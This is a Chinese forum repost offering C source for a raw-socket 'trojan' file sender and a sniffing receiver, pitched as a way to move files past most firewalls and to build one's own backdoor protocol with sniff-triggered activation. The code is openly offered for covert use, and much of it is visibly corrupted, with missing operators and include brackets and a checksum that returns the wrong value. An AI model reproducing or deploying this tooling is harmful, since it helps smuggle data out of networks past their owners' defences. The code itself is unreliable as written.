关于TCP/IP数据包的截取和分析(摘自安全焦点论坛,原作:ilsy)
Trackback: http://tb.blog.csdn.net/TrackBack.aspx?PostId=398259 |
通过发送tcp数据包来实现文件传送,可以穿透大部分防火墙,具体原理不在多说,请参看xfocus.chm
以下的程序只是一个DEMO,如果是大型服务器的话,你就自己优化吧,否则cpu占有率是很大的.你可以修改
成自己的后门协议,完成嗅探启动的功能,虽然网上也流传着嗅探启动的代码,但都是server端的,我把client端代码也公布,比较简单.
SERVER:
/*
Send File with Raw Sockets V 0.0.5
by wzt
*/
#include stdio.h>
#include unistd.h>
#include fcntl.h>
#include string.h>
#include sys/socket.h>
#include sys/types.h>
#include netinet/in.h>
#define MAXSIZE 65535
#define DATASIZE 1024
#define SEQ 12345
#define TROJAN_ID 6789
#define IPLEN sizeof(struct iphdr)
#define TCPLEN sizeof(struct tcphdr)
#define PACKLEN sizeof(struct iphdr) sizeof(struct tcphdr) sizeof(unsigned int) sizeof(unsigned int) strlen(trojan.data)
#define PSELEN sizeof(struct psehdr)
#define TROJANLEN sizeof(unsigned int) sizeof(unsigned int) strlen(trojan.data)
struct iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
};
struct tcphdr{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
struct psehdr{
unsigned long saddr;
unsigned long daddr;
unsigned char reserved;
unsigned char proto;
unsigned short len;
};
struct trojan_packet{
unsigned int trojan_id;
unsigned int datalen;
char data[DATASIZE];
};
void usage(char *pro);
unsigned short in_cksum(unsigned short *addr,int len);
int tcpsend(char *src_ip,char *src_port,char *dst_ip,char *dst_port,char *data);
void usage(char *pro)
{
fprintf(stdout,"%s /n",pro);
exit(0);
}
unsigned short in_cksum(unsigned short *addr,int len)
{
register int sum = 0;
register u_short *w = addr;
register int nleft = len;
u_short value =0;
while( nleft > 1 ){
sum = *w ;
nleft -= 2;
}
if( nleft == 1 ){
*(u_char *)(&value) = *(u_char *)w;
sum = value;
}
sum = ( sum >> 16 ) ( sum & 0xffff );
sum = ( sum >> 16 );
return value;
}
int tcpsend(char *src_ip,char *src_port,char *dst_ip,char *dst_port,char *data)
{
struct iphdr ip;
struct tcphdr tcp;
struct psehdr pseuhdr;
struct trojan_packet trojan;
struct sockaddr_in remote;
char data_buf[MAXSIZE];
int sock_id;
int data_len;
int flag=1;
int s_len;
if( ( sock_id = socket(AF_INET,SOCK_RAW,IPPROTO_TCP) ) -1 ){
perror("[-] socket");
exit(1);
}
if( setsockopt(sock_id,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) 0 ){
perror("[-] setsockopt");
exit(1);
}
trojan.trojan_id = htons(TROJAN_ID);
data_len = strlen(data);
strcpy(trojan.data,data);
trojan.datalen = data_len;
ip.h_verlen = ( 4 4 | sizeof(struct iphdr) / sizeof(unsigned long) );
ip.tos = 0;
ip.total_len = htons(PACKLEN);
ip.frag_and_flags = 0x40;
ip.ident = 13;
ip.ttl = 255;
ip.proto = IPPROTO_TCP;
ip.sourceIP = inet_addr(src_ip);
ip.destIP = inet_addr(dst_ip);
ip.checksum = 0;
tcp.th_sport = htons(atoi(src_port));
tcp.th_dport = htons(atoi(dst_port));
tcp.th_seq = htonl(SEQ);
tcp.th_ack = htonl(0);
tcp.th_lenres= (sizeof(struct tcphdr) / 4 4 | 0 );
tcp.th_flag = 2;
tcp.th_win = htons(512);
tcp.th_sum = 0;
tcp.th_urp = 0;
pseuhdr.saddr = ip.sourceIP;
pseuhdr.daddr = ip.destIP;
pseuhdr.reserved = 0 ;
pseuhdr.proto = ip.proto;
pseuhdr.len = htons( TCPLEN TROJANLEN );
memcpy(data_buf,&pseuhdr,PSELEN);
memcpy(data_buf PSELEN,&tcp,TCPLEN);
memcpy(data_buf PSELEN TCPLEN,&trojan,TROJANLEN);
tcp.th_sum = in_cksum( (unsigned short *)data_buf,( PSELEN TCPLEN TROJANLEN data_len ) );
memcpy(data_buf,&ip,IPLEN);
memcpy(data_buf IPLEN,&tcp,TCPLEN);
memcpy(data_buf IPLEN TCPLEN,&trojan,TROJANLEN);
remote.sin_family = AF_INET;
remote.sin_port = tcp.th_dport;
remote.sin_addr.s_addr = ip.destIP;
if( (s_len = sendto( sock_id,data_buf,PACKLEN,0,(struct sockaddr *)&remote,sizeof(struct sockaddr)) ) 0 ){
perror("[-] sendto");
exit(1);
}
printf("[ ] Packet Successfuly Sending %d size./n",s_len);
// printf("%s",trojan.data);
close(sock_id);
}
int main(int argc,char **argv)
{
char buffer[DATASIZE] = {0};
char temp[DATASIZE];
int fd;
int fd1;
int n_char;
if( argc 6 ) usage(argv[0]);
if( (fd = open(argv[5],O_RDONLY)) 0 ){
perror("[-] open");
exit(1);
}
while( (n_char = read(fd,buffer,DATASIZE)) > 0 ){
buffer[n_char] = 0;
tcpsend(argv[1],argv[2],argv[3],argv[4],buffer);
}
close(fd);
printf("[ ] Done./n");
return 0;
}
CLIENT:
/*
Recv File From Raw Sockets V 0.0.5
by wzt
*/
#include stdio.h>
#include sys/socket.h>
#include sys/types.h>
#include netinet/in.h>
#include signal.h>
#define DEBUG
#define DATASIZE 1024
#define SEQ 12345
#define TROJAN_ID 6789
#define PACKETLEN sizeof(struct iphdr) sizeof(struct tcphdr) sizeof(struct trojan_packet)
#define PORT 61
#define PID 14844
struct iphdr
{
unsigned char h_verlen;
unsigned char tos;
unsigned short total_len;
unsigned short ident;
unsigned short frag_and_flags;
unsigned char ttl;
unsigned char proto;
unsigned short checksum;
unsigned int sourceIP;
unsigned int destIP;
};
struct tcphdr{
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_lenres;
unsigned char th_flag;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};
struct trojan_packet{
unsigned int trojan_id;
unsigned int datalen;
char data[DATASIZE];
};
struct tpacket{
struct iphdr ip;
struct tcphdr tcp;
struct trojan_packet trojan;
};
void usage(char *help);
void wait_tcp_signal(int fd);
void usage(char *pro)
{
fprintf(stdout," usage : %s /n",pro);
exit(0);
}
void wait_tcp_signal(int fd)
{
struct tpacket *packet;
int sock_id;
int r_len;
packet = (struct tpacket *)malloc(PACKETLEN);
if( packet == NULL ){
printf("[-] malloc packet");
exit(1);
}
signal(SIGCHLD,SIG_IGN);
while(1){
if( (sock_id = socket(AF_INET,SOCK_RAW,IPPROTO_TCP)) 1 ){
perror("[-] socket");
exit(0);
}
printf("[ ] !!Waiting Signal!!./n");
while(1){
memset(packet,0,sizeof(struct tpacket));
r_len = read(sock_id,packet,sizeof(struct tpacket) DATASIZE );
#ifdef DEBUG
printf("[ ] Recv a signal %d size/n",r_len);
#endif
if( packet->ip.proto == IPPROTO_TCP ){
if( ntohs(packet->tcp.th_dport) == PORT ){
printf("[ ] !!!Found PORT./n");
kill(PID,SIGKILL);
printf("[ } KILL Pid OK./n");
break;
}
if( ntohl(packet->tcp.th_seq) == SEQ && packet->tcp.th_flag == 2 && ntohs(packet->trojan.trojan_id) == TROJAN_ID ){
#ifdef DEBUG
printf("[ ] Start ================================================= [ ]/n");
printf("[ ] Trojan.Id : %d/n",ntohs(packet->trojan.trojan_id));
printf("[ ] Source IP addr : %s/n",inet_ntoa(packet->ip.sourceIP));
printf("[ ] Source Port : %d/n",ntohs(packet->tcp.th_sport));
printf("[ ] Dest Port : %d/n",ntohs(packet->tcp.th_dport));
printf("[ ] Dest IP : %s/n",inet_ntoa(packet->ip.destIP));
printf("[ ] Data : %d/n",packet->trojan.datalen);
printf("[ ] End ================================================= [ ]/n");
#endif
write(fd,packet->trojan.data,packet->trojan.datalen );
}
}
}
close(sock_id);
}
}
int main(int __argc,char **__argv)
{
int fd;
if( __argc == 1 ) usage(__argv[0]);
if( (fd = creat(__argv[1],0777)) -1 ){
perror("[-] creat");
exit(1);
}
wait_tcp_signal(fd);
close(fd);
return 0;
}